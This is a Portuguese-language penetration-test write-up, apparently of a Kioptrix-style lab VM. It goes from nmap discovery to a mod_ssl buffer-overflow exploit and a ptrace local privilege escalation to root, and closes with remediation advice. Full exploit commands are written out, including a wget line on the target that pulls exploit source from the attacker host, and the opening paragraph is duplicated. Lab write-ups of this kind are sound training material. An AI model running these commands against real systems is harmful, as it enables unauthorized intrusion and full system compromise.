
Acesso root garantido ao identificar e explorar más configurações e software desatualizado. Vulnerabilidade de estouro de buffer em uma versão desatualizada do mod_ssl (CVE-2002-0082). A escalada de privilégios foi posteriormente alcançada ao explorar uma condição de corrida no utilitário "ptrace" do kernel Linux (CVE-2003-0127),
Acesso root seguro foi obtido identificando e explorando configurações incorretas e software desatualizado. Vulnerabilidade de buffer overflow em uma versão desatualizada do mod_ssl (CVE-2002-0082). A escalação de privilégios foi posteriormente alcançada ao explorar uma condição de corrida no utilitário "ptrace" do kernel Linux (CVE-2003-0127).
O primeiro passo foi identificar o endereço IP do alvo na sub-rede 192.168.56.0/24.
Descoberta de Hosts:
sudo nmap -sn 192.168.56.0/24
Resultado: O alvo foi identificado em 192.168.56.105.
Varredura de Portas e Enumeração de Serviços: Uma varredura Nmap abrangente foi executada para identificar portas abertas, serviços em execução e detalhes do sistema operacional.
sudo nmap -sS -sV -O -p- -oA lab_full_scan1 192.168.56.105
Principais Descobertas:
Porta 80/tcp & 443/tcp: Rodando Apache httpd 1.3.20 com mod_ssl/2.8.4 e OpenSSL/0.9.6b.
Porta 22/tcp: Rodando OpenSSH 2.9p2.
Porta 139/tcp: Rodando Samba smbd.
Detecção de SO: Kernel Linux 2.4.X (provavelmente 2.4.9 - 2.4.18).
A versão desatualizada do Apache e do mod_ssl imediatamente apresentou um vetor de alta probabilidade para acesso inicial.
O Exploit Database via searchsploit confirmou que o mod_ssl 2.8.4 é vulnerável a um conhecido Remote Buffer Overflow.
searchsploit mod_ssl 2.8
Identifiquei o exploit OpenFuckV2.c (EDB-ID: 47080) como o payload mais confiável para esta vulnerabilidade. Mirei o exploit para o host local e o compilei com as bibliotecas criptográficas necessárias.
Compilação do Exploit:
searchsploit -m 47080 gcc -o OpenFuck 47080.c -lcrypto
Executar o binário compilado sem argumentos forneceu uma lista de offsets suportados. Ao combinar o offset com o SO específico do alvo e a versão do Apache (Red-Hat Linux, Apache 1.3.20), determinei que o offset correto era 0x6b.
Execução:
./OpenFuck 0x6b 192.168.56.105 443 -c 40
O exploit forçou com sucesso um buffer overflow, concedendo um shell de baixo privilégio como o usuário apache.
bash-2.05$ whoami apache
Nota sobre a Metodologia: O exploit OpenFuck tenta baixar automaticamente um payload secundário de escalação de privilégios (ptrace-kmod.c) de um servidor remoto usando wget. No entanto, como o ambiente alvo não tinha acesso à internet de saída, esta etapa automatizada falhou (resolvendo para Host not found). Mudei para enumeração e exploração manual.
Enumeração do Sistema:
bash-2.05$ uname -a Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
O sistema estava executando uma versão de kernel altamente vulnerável: 2.4.7-10. Pesquisar por exploits visando este kernel Linux específico revelou uma vulnerabilidade local de escalação de privilégios utilizando ptrace/kmod.
Preparação do Payload: Localizei o exploit localmente (EDB-ID: 3) e o hospedei via um servidor HTTP Python na máquina atacante para facilitar a transferência.
Atacante Host:
searchsploit -m 3 python3 -m http.server 8000
Máquina Alvo:
cd /tmp wget http://192.168.56.1:8000/3.c
O código fonte do 3.c foi transferido com sucesso para o diretório /tmp do alvo, compilei e executei nativamente na máquina alvo.
Execução e Comprometimento Root:
gcc 3.c -o exploit
./exploit
whoami
root
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
A condição de corrida ptrace foi explorada com sucesso, escalando privilégios do daemon apache para root. O comprometimento total do sistema foi alcançado.
Para proteger este sistema contra as vulnerabilidades exploradas:
Atualizar Serviços Web: O servidor Apache deve ser atualizado para as últimas versões estáveis para corrigir a vulnerabilidade de buffer overflow CVE-2002-0082, que permite execução remota de código não autenticada.
Patches de Kernel: O kernel Linux (2.4.7-10) é vulnerável a múltiplos exploits locais de escalação de privilégios, incluindo a condição de corrida ptrace (kmod). O kernel do sistema operacional deve ser atualizado para uma versão moderna e suportada.
Segmentação de Rede & Filtragem de Saída: O servidor deve ser colocado atrás de um firewall que restrinja tráfego de saída desnecessário. Embora o wget automatizado tenha falhado neste laboratório offline, a filtragem de saída preveniria que aplicações web comprometidas puxem payloads maliciosos secundários da internet em um ambiente real.